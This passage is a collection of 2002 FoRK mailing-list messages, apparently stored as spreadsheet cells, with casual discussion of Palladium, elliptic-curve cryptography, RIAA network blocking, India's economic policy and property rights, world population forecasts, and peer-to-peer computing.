espionage hidden by the veil of RIAA copyright enforcement.If you have questions, comments, or concerns regarding this policy, please
e-mail riaa@informationwave.net.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</si>
  <si>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Evidently, I have permission to pass this along. :-).Don't try this at home, boys and girls. This is a professional neologist at
work...Cheers,
RAH
Comedy is not pretty...--- begin forwarded text
Date: Wed, 7 Aug 2002 22:40:56 +0100
From: Adam Back 
To: "R. A. Hettinga" 
Cc: Adam Back 
Subject: wow - palladiated! (Re: Palladium: technical limits and implications)
User-Agent: Mutt/1.2.2iOn Wed, Aug 07, 2002 at 03:08:08PM -0400, R. A. Hettinga wrote:
&gt; At 6:54 PM +0100 on 8/7/02, Adam Back wrote:
&gt; &gt; Palladiumized
&gt;
&gt; Palladiated?
&gt;
&gt; ;-).that's pretty funny, rhymes with irradiated -- nice connotations of
radioactive material with radioactive half-lives spewing
life-hazardous neutron radiation ;-)Helps that palladium is in fact a heavy metal.  Man, perhaps Pd even
_has_ a half-life on the decay path from plutonium down to lead or
something.  That would be very funny.Adam---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</si>
  <si>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&gt; On Wed, Aug 07, 2002 at 03:08:08PM -0400, R. A. Hettinga wrote:
&gt; &gt; At 6:54 PM +0100 on 8/7/02, Adam Back wrote:
&gt; &gt; &gt; Palladiumized
&gt; &gt;
&gt; &gt; Palladiated?
&gt; &gt;And the antonym? Odyssielded. Rhymes with shielded.http://homepage.mac.com/cparada/GML/Odysseus.htmlOdysseus was the first to learned the Palladium Oracles from the Seer Hellenus.
Odysseus neutralised (neutronised?) Palladium's defence for Troy.
Odysseus invented the first Trojan Horse.Incidentally public revelation of the Palladium is supposed to be on
Seventh Day to the Ides of Jun, i.e. 8th. June. The Newsweek article was
a bit late.http://www.clubs.psu.edu/aegsa/rome/jun06.htm
David Chia
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Gordon Mohr wrote:
&gt;Does this mean that Eliptic Curve encryption is
&gt;now easily breakable? Or faster than before with
&gt;no loss in strength? Or stronger?
&gt;
&gt;Raw bits are OK, cooked bits are better.
Oh.  OK.
These results don't help break EC crypto at all.
With RSA, you pick a number with secret factors and to break the
cryptosystem, you can factor the number.  Due to fast sub-exponential
algorithms for factoring, the number had better be 1024 bits at the
very least (record = 524 bits).
With EC, you pick a curve and pick points on the curve with secret
discrete logarithm.  To break the cryptosystem you can compute a
discrete log but the best algorithms for random curves are exponential
(record = 109 bits, for a slightly special curve).
Up until now, people pick curves chosen from a small fixed set.  One
choice is a few curves with special properties that originally were
chosen to make point-counting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don't have to rely on standard curves but can
distribute risk over many curves in case some get broken at some
stage.  In certain circumstances you can even keep the curve itself
secret so an attacker doesn't know which discrete log to try to
compute!  There isn't really a good analogy with RSA, but imagine
wanting to factor a number and you don't even know what it is...
So basically recent progress has made new things feasible and this
makes them even more so.  The underlying primitives for signing,
encoding and so on are not affected, but the security vibes get better.
R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;                                                                   In the
&gt; Philippines, getting legal title can take 20 years.  In Egypt, about 80%
&gt; of the population in Cairo lives in places where they are officially
&gt; illegal.If the situation in Egypt is anything
like the situation in the Philippines,
it's because people (due to a strange
desire for jobs) squat on land which
they don't own.*For people to be able to buy their own
land, capitalism must be healthy, but
not triumphant; there need to be too
many capitalists, not too few.(how well off were the major landowners
in india before independence?)-Dave* In the US, we are not so friendly to
our capitalists: adverse possession is
only supposed to take 5 years.(How much do we owe to our frontiers?
Heck, in Egypt didn't they pretty much
invent geometry a few millenia ago to
keep track of their property lines?)http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Beautiful, let the information wars begin... I can't wait to see how 
this evolves... Perhaps the RIAA will seek legislation preventing others 
from preventing their access to other networks? I can't see how that 
would work out though... Yes, very interesting, and quite sad at the 
same time.Elias
R. A. Hettinga wrote:&gt;http://www.informationwave.net/news/20020819riaa.php ...
&gt;
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Tue, 20 Aug 2002, Joseph S. Barrera III wrote:&gt; I just use the free/adware version of Opera. I mean, half the pagesI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back).&gt; I look at have ads on them anways, so I'm pretty good at ignoring them.
&gt; Plus, you can change settings that change what type of ads you get,
&gt; so the ads I get are pretty innocuous. I think I listed books and
&gt; sleeping as my interests :-)I notice Opera tends to ignore my advertisement preferences, so this is 
the core reason why I don't use it. Mozilla does almost everything Opera 
does, minus the obnoxious ad slime, so why use use Opera then?http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>I think that this and other articles confuse Socialism with 
Bureaucracy.  Libertarianism as implemented in North America is not 
exactly the shining pinnacle of economic efficiency.Just try starting a telephone company in the US or (even worse) 
Canada.  It can take a year or more to get the blessing of our own 
"Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more 
socialist leaning Canada, Industry Canada and the CRTC).Yet,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down.So.. tell me again.. how are we better off?-Ian.
On Tuesday, August 20, 2002, at 12:09 PM, John Hall wrote:The Mystery of Capital: Why Capitalism Triumphs in the West and Fails
Everywhere Else -- by Hernando De Soto	Is something I'm reading now.My impression is that France is not anywhere near the "Permit Raj"
nightmare that India is (and became).  Nor has its market been closed
like India's has.But De Soto's work is perhaps just as important or more so.  He hasn't
dealt specifically with India, but I recall examples from Peru,
Philippines, and Egypt.  In Lima, his team took over a year (I think it
was 2) working 8 hr days to legally register a 1 person company.  In the
Philippines, getting legal title can take 20 years.  In Egypt, about 80%
of the population in Cairo lives in places where they are officially
illegal.India hasn't been helped by its socialism.  Socialism has certainly
helped strangle the country in permits.  But perhaps De Soto is right
that the real crippling thing is keeping most of the people out of the
legal, official property system.Putting most of the people in the property system was something the west
only finished about 100 years ago, or Japan did 50 years ago.  It wasn't
easy, but we live in a society that doesn't even remember we did it.
-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Robert
Harley
Sent: Tuesday, August 20, 2002 11:24 AM
To: fork@spamassassin.taint.org
Subject: Re: The Curse of India's SocialismRAH quoted:
Indians are not poor because there are too many of them; they are
poor
because there are too many regulations and too much government
intervention
-- even today, a decade after reforms were begun. India's greatest
problems
arise from a political culture guided by socialist instincts on the
one
hand and an imbedded legal obligation on the other hand.Nice theory and all, but s/India/France/g and the statements hold just
as true, yet France is #12 in the UN's HDI ranking, not #124.
Since all parties must stand for socialism, no party espouses
classical liberalismI'm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http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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globalization.Somebody oughta pass a law to prevent those things, of course, before it's
too late. The People's way of life *must* be preserved in its natural,
pre-industrial state, or we'll lose it forever.;-).Cheers,
RAH
http://www.nytimes.com/2002/08/20/science/earth/20POPU.html?pagewanted=print&amp;position=topThe New York Times
August 20, 2002
Experts Scale Back Estimates of World Population Growth
By BARBARA CROSSETTEDemography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- 2.1 children for the average
mother, one baby to replace each parent, plus a fraction to compensate for
unexpected deaths in the overall population.A few decades ago in certain countries like Brazil, Egypt, India and Mexico
fertility rates were as high as five or six.As a result, United Nations demographers who once predicted the earth's
population would peak at 12 billion over the next century or two are
scaling back their estimates. Instead, they cautiously predict, the world's
population will peak at 10 billion before 2200, when it may begin declining.Some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available.Sharp fertility declines in many industrialized and middle-income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planning."Projections aren't terribly accurate over the long haul," said Dr.
Nicholas Eberstadt, a demography expert at the American Enterprise
Institute in Washington. "Demographers have been surprised by just about
every big fertility change in the modern period. Demographers didn't
anticipate the baby boom. They did not anticipate the subsequent decline in
fertility in industrialized Western democracies."What's next? Demographers can agree generally on a few measurable facts and
some trends. The world's population, now 6.2 billion, quadrupled in the
20th century, and changed in drastic ways. In 1900, 86 percent of the
world's people lived in rural areas and about 14 percent in urban areas. By
2000, urban communities were home to 47 percent of the population, with 53
percent still in the countryside.Between now and 2030, when the global population is expected to reach about
eight billion, almost all the growth will be in cities. But urbanization is
not necessarily a bad thing for the environment, said Dr. Joseph Chamie,
director of the United Nations' population division."Moving to cities frees up the land for forestry, agriculture and many
other activities," Dr. Chamie said. "You're getting people concentrated, so
you can probably recycle more easily. People change their lifestyles. The
Indian moving from the boonies of Uttar Pradesh to the city of Lucknow gets
educational opportunities, cultural opportunities, all sorts of political
participation. He can be influenced by advertising and public relations
campaigns. Immunization will be better, and family planning."As births fall and lives are extended, the global population is getting
older. The over-80 age group is the fastest growing.But not everywhere. For example, the United Nations calculates that life
expectancy at birth is being slashed in countries hardest hit by AIDS. In
South Africa, the life of a baby born now should be 66 years; AIDS has cut
that to 47. In Zimbabwe, the drop has been to 43 years from 69. In
Botswana, it is 36 years, down from 70.Another cautionary sign from projections is that where populations are
continuing to grow fastest, societies and governments may be least likely
to cope with the results, including strains on natural resources -
farmland, water, air, forests and animals.Last year, the organization published a report and wall chart, "Population,
Environment and Development," plotting and analyzing population changes as
its contribution to the debate surrounding the Johannesburg summit meeting.The United Nations estimates that the world's current population, 6.2
billion, is growing at an annual rate slightly over 1.2 percent, producing
some 77 million people. Of this growth, 97 percent is taking place in
less-developed countries, said Dr. Chamie, whose position at the United
Nations makes him chief keeper of the world's statistics. Six nations will
dominate this growth, and in this order: India, China, Pakistan, Nigeria,
Bangladesh and Indonesia.Thus, though fertility is declining unexpectedly in a poor country like
India, which has more than a billion people, the actual numbers continue to
rise rapidly because the base is so large. India is gaining as many people
annually as China, Pakistan and Nigeria combined, the United Nations says.India is projected to have at least 100 million more people than China by
2050, even if China's one-child policy is relaxed. Small families are now
the norm for the Chinese, whose standard of living has risen above that of
the people of India by many measures.Among industrialized countries, the United States alone has a growth rate
comparable to that of developing nations. It now ranks seventh in growth,
Dr. Chamie said, but 80 percent of that growth comes from immigration. In
Europe, populations are shrinking, even with more immigration.With much of the population bulge predicted in Asia, the East-West Center
in Honolulu has just published a report, "The Future of Population in
Asia," which finds cause to fear considerable environmental stress in a
region where population densities and numbers are often great. Asia, the
report notes, already has 56 percent of the world's population living on 31
percent of its arable land, and more than 900 million people exist on less
than $1 a day."Asia faces the most acute pressure on arable agricultural land of any
region in the world," the report says, adding that expansion of farmland
has been made at the cost of forests. Acute water scarcity, a significant
loss of biodiversity and more urban pollution seem inevitable. Twelve of
the world's 15 most polluted cities are in Asia. By 2020, the report
predicts, Asia will be producing more carbon dioxide emissions than any
other region."When looking at current and future environmental concerns in Asia," the
report concludes, "the number of people to be fed, clothed, housed,
transported, educated and employed may not be the only issue, but it is an
issue that cannot be ignored."--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t>
  </si>
  <si>
    <t xml:space="preserve">
The question is why are they still poor?Especially given the success of Indian immigrants in other societies?South Korea was a lot poorer after the Korean war than Ghana when it
gained its independence at about the same time.  That was after India
gained independence, and Korea couldn't have been in better shape at
that point than India (my impression).&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt; sateesh narahari
&gt; Sent: Tuesday, August 20, 2002 12:44 PM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Re: The Curse of India's Socialism
&gt; 
&gt; All good arguments, except till you realize that
&gt; majority of indians were poor even before
&gt; independence.
&gt; 
&gt; Sateesh
&gt; 
&gt; 
&gt; --- "R. A. Hettinga"  wrote:
&gt; &gt;
&gt; http://online.wsj.com/article_print/0,,SB1029790639190441115,00.html
&gt; &gt;
&gt; &gt;
&gt; &gt; The Wall Street Journal
&gt; &gt;
&gt; &gt; August 20, 2002
&gt; &gt; COMMENTARY
&gt; &gt;
&gt; &gt; The Curse of India's Socialism
&gt; &gt;
&gt; &gt; By CHRISTOPHER LINGLE
&gt; &gt;
&gt; &gt; In a classic case of deflecting blame for their own
&gt; &gt; shortcomings,
&gt; &gt; politicians in India have identified the size of the
&gt; &gt; population as the
&gt; &gt; country's biggest problem. This position was stated
&gt; &gt; in a unanimous
&gt; &gt; parliamentary resolution passed on the 50th
&gt; &gt; anniversary of independence.
&gt; &gt; Half a decade later, it is a belief that still
&gt; &gt; resonates with many. Yet it
&gt; &gt; is hard to imagine a more cynical view. If left free
&gt; &gt; from the extensive
&gt; &gt; interference of various levels of government, the
&gt; &gt; energy and creativity of
&gt; &gt; the Indian people could soon allow them to be among
&gt; &gt; the richest on earth.
&gt; &gt;
&gt; &gt; Indians are not poor because there are too many of
&gt; &gt; them; they are poor
&gt; &gt; because there are too many regulations and too much
&gt; &gt; government intervention
&gt; &gt; -- even today, a decade after reforms were begun.
&gt; &gt; India's greatest problems
&gt; &gt; arise from a political culture guided by socialist
&gt; &gt; instincts on the one
&gt; &gt; hand and an imbedded legal obligation on the other
&gt; &gt; hand.
&gt; &gt;
&gt; &gt; While India's political culture reflects the beliefs
&gt; &gt; of its founding
&gt; &gt; fathers, there is the additional matter of the
&gt; &gt; modified preamble to its
&gt; &gt; constitution that specifies: "India is a sovereign,
&gt; &gt; secular, socialist
&gt; &gt; republic." It was Indira Gandhi who had the words
&gt; &gt; "socialist" and "secular"
&gt; &gt; added in the late 1970s. At the same time, she also
&gt; &gt; amended the relevant
&gt; &gt; section in the Representation of Peoples Act to
&gt; &gt; require that all recognized
&gt; &gt; and registered parties swear by this preamble. Since
&gt; &gt; all parties must stand
&gt; &gt; for socialism, no party espouses classical
&gt; &gt; liberalism (yet there are
&gt; &gt; numerous communist parties).
&gt; &gt;
&gt; &gt; While one can appreciate the difficulty of
&gt; &gt; abandoning ideas with such
&gt; &gt; honored lineage, the fact that socialism has been
&gt; &gt; widely discredited and
&gt; &gt; abandoned in most places should prompt Indians to
&gt; &gt; reconsider this
&gt; &gt; commitment. Despite evidence of its failure as an
&gt; &gt; economic system, many of
&gt; &gt; the socialists who carry on do so by trying to
&gt; &gt; proclaim that their dogma
&gt; &gt; reinforces certain civic virtues. A presumed merit
&gt; &gt; of socialism is that it
&gt; &gt; aims to nurture a greater sense of collective
&gt; &gt; identity by suppressing the
&gt; &gt; narrow self-interest of individuals. However, this
&gt; &gt; aspect of socialism lies
&gt; &gt; at the heart of its failure both as a political tool
&gt; &gt; as well as the basis
&gt; &gt; for economic policy.
&gt; &gt;
&gt; &gt; Let's start with the economic failures of socialism.
&gt; &gt; Most of the grand
&gt; &gt; experiments have been ignominiously abandoned or
&gt; &gt; recast in tortured terms
&gt; &gt; such as the "Third Way" that defer to the importance
&gt; &gt; of markets and
&gt; &gt; individual incentives. Unfortunately, it took a
&gt; &gt; great deal of human
&gt; &gt; suffering before socialists abandoned their goal of
&gt; &gt; trying to create an
&gt; &gt; economic system on the basis of collective goals.
&gt; &gt;
&gt; &gt; Socialist ideologues are impervious to evidence that
&gt; &gt; their system inspires
&gt; &gt; even more human misery in the civic realm. This is
&gt; &gt; because socialism
&gt; &gt; provides the political mechanism for and legitimacy
&gt; &gt; by which people
&gt; &gt; identify as members of groups. While it may suit the
&gt; &gt; socialist agenda to
&gt; &gt; create them-and-us scenarios relating to workers and
&gt; &gt; capitalists or
&gt; &gt; peasants and urban dwellers, this logic is readily
&gt; &gt; converted to other types
&gt; &gt; of divisions.
&gt; &gt;
&gt; &gt; In the case of India, competition for power has
&gt; &gt; increasingly become
&gt; &gt; identified with religiosity or ethnicity, as is
&gt; &gt; evident by the rise of the
&gt; &gt; Bharatiya Janata Party, supported by radical
&gt; &gt; Hindutva supporters. As
&gt; &gt; elsewhere, political parties based on religion are
&gt; &gt; by their very nature
&gt; &gt; exclusionary. These narrow concepts of identity work
&gt; &gt; against nation
&gt; &gt; building since such a politics forces arrangements
&gt; &gt; that cannot accommodate
&gt; &gt; notions of universal values.
&gt; &gt;
&gt; &gt; Socialism also sets the stage for populist promises
&gt; &gt; of taking from one
&gt; &gt; group to support another. This variety of political
&gt; &gt; posturing by the
&gt; &gt; Congress Party was used to build a coalition of
&gt; &gt; disaffected minorities. In
&gt; &gt; turn, the BJP built its power base on a promise to
&gt; &gt; restore power to Hindus.
&gt; &gt; And so it is that India's heritage of socialist
&gt; &gt; ideology provided the
&gt; &gt; beginnings of a political culture that evolved into
&gt; &gt; sectarian populism that
&gt; &gt; has wrought cycles of communal violence. Populism
&gt; &gt; with its solicitations of
&gt; &gt; political patronage, whether based upon nationalism
&gt; &gt; or some other ploy, is
&gt; &gt; also open to the sort of rampant corruption so
&gt; &gt; evident in India.
&gt; &gt;
&gt; &gt; At issue in India is nothing less than the role of
&gt; &gt; the state. Should it be
&gt; &gt; used as a mechanism to protect the freedom and
&gt; &gt; rights of individuals? Or
&gt; &gt; should the state be a vehicle for groups to gain
&gt; &gt; power? It should be clear
&gt; &gt; the latter approach would lead to the destruction of
&gt; &gt; India's democracy
&gt; &gt; while the former will allow it to survive.
&gt; &gt;
&gt; &gt; It is undeniable that India's public policy guided
&gt; &gt; by socialism has
&gt; &gt; promoted divisions that contributed to social
&gt; &gt; instability and economic
&gt; &gt; destruction. This dangerous game has only served the
&gt; &gt; narrow interests of
&gt; &gt; those who seek to capture or preserve power. That
&gt; &gt; India is a "socialist"
&gt; &gt; state, specified in a preamble to the constitution,
&gt; &gt; makes this binding
&gt; &gt; commitment evident in the nature of interventionist
&gt; &gt; policies that have
&gt; &gt; wrought slower economic growth causing great harm to
&gt; &gt; the poor and unskilled
&gt; &gt; who have lost access to economic opportunities.
&gt; &gt; Socialism also introduced
&gt; &gt; forces that are destroying India's hard-earned
&gt; &gt; democracy. A paradigm shift
&gt; &gt; in the nature of Indian politics is needed so the
&gt; &gt; state ceases serving as a
&gt; &gt; mechanism for groups to gain power and instead
&gt; &gt; becomes an instrument to
&gt; &gt; secure rights and freedoms for individuals.
&gt; &gt;
&gt; &gt; Mr. Lingle is professor of economics at Universidad
&gt; &gt; Francisco Marroquin in
&gt; &gt; Guatemala, and global strategist for
&gt; &gt; eConoLytics.com.
&gt; &gt;
&gt; &gt;
&gt; &gt;
&gt; &gt; --
&gt; &gt; -----------------
&gt; &gt; R. A. Hettinga 
&gt; &gt; The Internet Bearer Underwriting Corporation
&gt; &gt; 
&gt; &gt; 44 Farquhar Street, Boston, MA 02131 USA
&gt; &gt; "... however it may deserve respect for its
&gt; &gt; usefulness and antiquity,
&gt; &gt; [predicting the end of the world] has not been found
&gt; &gt; agreeable to
&gt; &gt; experience." -- Edward Gibbon, 'Decline and Fall of
&gt; &gt; the Roman Empire'
&gt; &gt; http://xent.com/mailman/listinfo/fork
&gt; 
&gt; 
&gt; __________________________________________________
&gt; Do You Yahoo!?
&gt; HotJobs - Search Thousands of New Jobs
&gt; http://www.hotjobs.com
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Ian Andrew Bell writes:
&gt; I think that this and other articles confuse Socialism with 
&gt; Bureaucracy.  Libertarianism as implemented in North America is not 
&gt; exactly the shining pinnacle of economic efficiency.Libertarianism is implemented in North America? Where?!?!?&gt; Just try starting a telephone company in the US or (even worse) 
&gt; Canada.  It can take a year or more to get the blessing of our own 
&gt; "Permit Rajs" at the FCC, PUC, and PTTs (or, in the decidedly more 
&gt; socialist leaning Canada, Industry Canada and the CRTC).Telecom regulations are an example of implemented Libertarianism?And for how screwed up North America's telecom industries and
regulators are, they're better than much of the rest of the
world, where it doesn't just "take a year or more" to get
started: it's impossible/illegal. Matters of degree, matter.&gt; Yet, despite all of this intense regulation and paper pushing, as 
&gt; well as regulatory scrutiny by the FTC, SEC, and IRS, the 
&gt; executives of Telecom Companies have managed to bilk the investment 
&gt; community for what looks to be tens of billions of dollars.  They 
&gt; finished their routine with the a quadruple lutz -- laying off 
&gt; hundreds of thousands of workers when it all came crashing down.
&gt; 
&gt; So.. tell me again.. how are we better off?We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 North America, or 
  - India/Peru/Egypt/Philippines/etc????- Gordon
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Owen Byrne:
&gt;The factbook calls it "welfare capitalism" - don't really care if its 
&gt;socialism or capitalism, it still seems like an alternative to North 
&gt;American 'capitalism.'It's not so much an alternative as it is a small
variant of the US's own welfare capitalism. In
these matters, we're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http://mobile.msn.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
"Gordon Mohr" said:&gt; If you plan to spend most of your time in that broke/
&gt; unemployed/unexceptional mode, please, leave North America 
&gt; for Scandinavia. hmm, I might, at least they've got affordable DSL there, and haven't
signed a DMCA-like law yet ;)--j.
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Tue, 2002-08-20 at 14:16, Dave Long wrote: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The Philippines suffers from a Spanish-imposed aristocratic landowner
class, the same as in most of Latin America, with the serf-like
relationships that go with it.  You have multiple generations of
peasants/squatters that cultivate and live on the lands almost as a
human parts of the property package.The problem in the Philippines is that the landowner class is fading,
but the peasants are still operating under the old economic assumption
even though it isn't being imposed on them in most cases.  In a number
of areas, you have landowners that don't use their lands during bad
years (i.e.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do.The government's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middle-class,
and enjoy a better lifestyle under that arrangement.  So the result of
all this is that the landowners either run an economically sub-optimal
agriculture business to protect their lands, or they risk having their
land seized without compensation and given to the peasants/squatters who
will gladly sell it back to the plantation owner rather than becoming
scratch farmers, another economically sub-optimal solution. The only
real role of the government in this arrangement is to be a drag on the
economy.And I don't know about 20 years for land titles in the Philippines.  It
takes a little longer than in the US (though not much), and you may have
to bribe someone to make it work well in an expedited manner, but it
isn't that onerous in the regions I'm familiar with.Speaking as a former Philippine plantation owner. (Yes, really. On
Negros and Cebu. Have I led a strange life or what?)-James Rogers
 jamesr@best.comhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Some of the reasons they don't own it is because it is government land
that you can't convert without an army of lawyers.In other cases, you originally had owners who didn't have the 'right' to
subdivide, but they subdivide anyway.It is interesting to note that for several centuries in Japan it was a
death sentence to sell land.  They sold it anyway, and kept records.In the US, we eventually got quite friendly with squatters and adverse
possession, and integrated out extra-legal arrangements and 'spontaneous
social contracts' into the official law.Mr. Long, I think you'd particularly enjoy the De Soto work.&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Dave
&gt; Long
&gt; Sent: Tuesday, August 20, 2002 2:17 PM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: RE: The Curse of India's Socialism
&gt; 
&gt;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&gt; 
&gt; For people to be able to buy their own
&gt; land, capitalism must be healthy, but
&gt; not triumphant; there need to be too
&gt; many capitalists, not too few.
&gt; 
&gt; (how well off were the major landowners
&gt; in india before independence?)
&gt; 
&gt; -Dave
&gt; 
&gt; * In the US, we are not so friendly to
&gt; our capitalists: adverse possession is
&gt; only supposed to take 5 years.
&gt; 
&gt; (How much do we owe to our frontiers?
&gt; Heck, in Egypt didn't they pretty much
&gt; invent geometry a few millenia ago to
&gt; keep track of their property lines?)
&gt; 
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">	&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Justin
&gt; Mason
&gt; 
&gt; So IMO it's the corruption that's the problem; and corruption !=
&gt; regulation, and corruption != socialism.   Also, over-population is
really
&gt; a symptom of that.Socialism increases regulation which increases corruption.  But that
doesn't matter as much as if the official law does not conform to the
facts on the ground.If you don't match the law to the facts on the ground, you wind up with
a two-tier society (De Soto's Bell Jar).  Worse, the massive evasion of
the official law encourages the corruption you speak of.In some countries, the agencies in charge of registering property also
arrange for illegal living arrangements for their employees.  They do
this because even the people who run the system can't make it work for
people they care about.
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>IAB: That is a GOOD think about South Korea.  Not a bad thing.That is easy to see, since the people of India would like to have more
of what SK has ...
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Robert
&gt; Harley
&gt; Sent: Wednesday, August 21, 2002 3:10 AM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Re: The Curse of India's Socialism
&gt; 
&gt; IAB wrote:
&gt; &gt;This of course came at the expense of the environment: widespread air
&gt; &gt;and water pollution, etc.: South Korea is the 10th largest CO2
&gt; &gt;polluter in the world, despite ranking 26th in population.
&gt; 
&gt; CO2 is pollution?  And here I am going around metabolizing glucose and
&gt; exhaling carbon dioxide every four seconds since I was a kid!  Why
&gt; didn't anybody tell me?!?  I'll hold my breath from now on.  Honest
guv.
&gt; 
&gt; R
&gt; http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>I don't know who said the below.1) Measured in money, you are wrong.  Different ethnic groups achieve at
widely different rates.  Always have.  A lot of research has been done
on that topic, Sowell among others.2) If you exchanged the population of India and America, in a generation
India would look like America.  In Two, America would look like India.3) As Bob said: 'valuable resources' has notin' to do with it.  See
Japan, Hong Kong, Singapore, ...
&gt; &gt;
&gt; &gt; I'm sure that if someone checked the statistics, that the number of
&gt; &gt; "successful" vs. "unsuccessful" (how to define those?) Indian
&gt; &gt; immigrants in the US is statistically similar to the number of
&gt; &gt; successful vs. unsuccessful Scotsmen.  I'm not going to, though.
&gt; &gt;
&gt; &gt; India is poor because it always was poor.  Unlike other countries
&gt; &gt; in the region (including Ghana, Nigeria, et al) that have emerged
&gt; &gt; from the ashes of Imperialism with strong growth, India is not
&gt; &gt; blessed with a strong base of valuable resources.
&gt; http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>this just struck me as odd, but interesting in a way i guess.http://www.lifegem.com/index.htm
What is a LifeGem?A LifeGem is a certified, high quality diamond created from the carbon of 
your loved one as a memorial to their unique and wonderful life.
Chris
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>Dear C. Greg Curry, This Network World Fusion  article was sent to you by Geege
Guten tag, y'all.
---------------------------------------------------------------- 
Have you visited Network World Fusion yet? On www.nwfusion.com  you will find additional informative articles, primers and research on specific network technologies and products. Visit us today at www.nwfusion.com 
---------------------------------------------------------------- 
/news/2002/0819specialfocus.html:---------------------------------------------------------------- 
				P2P getting down to some serious work
	 By John Fontana
    Network World, 08/19/02
 Just a few years removed from the mayhem of music swapping that clogged corporate networks, peer-to-peer technology is growing up and rediscovering its roots as a legitimate concept for distributed computing in corporate environments and the Internet.The turnaround is distinct since P2P has distanced itself from the darling days of Napster and has been transplanted onto the architectural drawing boards of Internet and corporate network gurus.For network executives, the about-face is showing up in such discrete places as wireless routing, identity management, Web services and grid computing. P2P has proved its worth - albeit with a few warts -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evolutionRegardless, P2P's evolution has hit its next stage. "Peer-to-peer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we're seriously talking about the network becoming the computer, incorporating some P2P connections and being able to share processes and power, which is what grid computing provides."Observers say it's a renaissance."P2P's reverting to an architecture that can be applied to solve problems that by their very nature are distributed," says Neil Macehiter, senior consultant for Ovum, a research and consulting firm. "But the question is can this model provide benefits for business use."Macehiter says it can, but he cautions that security, such as removing blocks to P2P traffic on corporate firewalls, is still a major inhibitor to acceptance. "But you can imagine something like grid extending to share application logic instead of just being a data grid or a storage grid. When you look at Web services sharing business logic in the enterprise, you see the intersection with grid and P2P," he says.
Working togetherTo underscore P2P's evolution, the Global Grid Forum (GGF), a 2-year-old group founded by academics and researches, merged in April with the P2P Working Group, originally founded by Intel. The groups are attempting to marry the GGF's work on harnessing servers on a grid with P2P's ability to connect desktops."We're now trying to figure out how grid and P2P play nice together, and capture that power for use in enterprise computing," says Andrew Chien, co-director of the GGF's peer-to-peer area and CTO of Entropia, a provider of desktop grid applications.Late last month, the merged group began evaluating how P2P relates to the Open Grid Services Architecture, an effort to standardize grid computing. Chien says his group is exploring how P2P protocols for such things as registration, resource discovery and coordination of data transfer support a common grid infrastructure.And P2P's roots are reaching into other areas. It is an integral part of mobile wireless technology set for release this fall by MeshNetworks. The company's MeshLAN software extends the range of 802.11 wireless networks by making every wireless peer an endpoint in an ad-hoc P2P network and also a router/repeater to channel traffic to other peers.Using a patented multihopping technology, peers that are out of range of wireless access points or peers they wish to communicate with can hop through other peers to reach their destination, including corporate LANs. It not only increases the wireless range, it preserves throughput, which is up to 6 megabits. The technology also is mobile, letting hopping take place from nodes traveling in vehicles up to 250 mph."P2P allows us to do the hopping, and our algorithms allow the traffic to pick the most efficient path to travel," says Rick Rotondo, vice president of disruptive technologies for MeshNetworks. "The beauty of a P2P network is that it is self-forming and self-healing."And the technology is mature.  The Defense Advanced Research Projects Agency (DARPA), which created the Internet, spent $150 million developing the peer technology for use in forming instant networks among soldiers on a battlefield. MeshNetworks licensed it from DARPA has spent an additional $27 million to create a commercial product.P2P also is key to the PingID Project to create an identity management system similar to work under way by Microsoft and the Liberty Alliance Project, which are not using P2P. "Ideally, you need a way to create, manage and exchange digital identity information with no one in the middle of the transaction," says Andre Duran, founder of the project. He says that's P2P, but it's just one part of the equation. "Your ID is a virtual private vault with different drawers," Duran says. "One drawer may be on your PC, one may be with a service provider, and you need a client to manage all that. We are building the infrastructure to support that."Ping ID is working on server and client software that acts like a mini-Web server and maintains a repository of user's identity information. Users have the option of exchanging IDs directly through P2P or using client/server technology to authorize a third party to dispense their identity data. "P2P provides a level of control that other architectures don't," Duran says. "It comes down to the fact that some applications are more efficient with P2P."That is the concept that is driving P2P into so many different areas of computing."P2P has evolved from something highly disruptive to something complementary to intranets, extranets, mobile users and all the Web integration," says Greg Bolcer, CTO of Endeavors Technology, which develops a P2P collaboration software called Magi.And although P2P is still settling into this new role, it's obvious that its reputation as a music-swapping corporate scourge are now well behind it.
					  Copyright 2001 Network World, Inc. All rights reserved 
---------------------------------------------------------------- Sent by: Geege  mailto:grlygrl201@aol.com ................................................................ 
This message was sent from 
/news/2002/0819specialfocus.html on 
Network World Fusion
http://www.nwfusion.com/ 
................................................................ http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>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else.If this kind of secret traffic is allowed to continue, it will pose a
very serious threat to our computer communications infrastructure.At the moment, the dominant paradigm for computer security research
known as "full disclosure"; people who discover security
vulnerabilities in software tell the vendor about them, and a short
while later --- after the vendor has had a chance to fix the problem
--- they publish the information, including code to exploit the
